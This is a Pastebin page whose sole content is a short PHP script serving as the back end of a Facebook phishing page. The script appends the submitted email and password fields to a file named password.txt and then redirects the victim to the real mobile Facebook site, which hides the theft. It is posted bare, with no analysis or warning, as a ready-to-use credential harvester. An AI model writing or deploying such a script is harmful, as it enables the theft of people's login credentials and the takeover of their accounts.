Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["email"].PHP_EOL); fwrite($handle,$_POST["pass"].PHP_EOL); fwrite($handle,"".PHP_EOL); fclose($handle); header("Location: https://m.facebook.com"); exit; ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement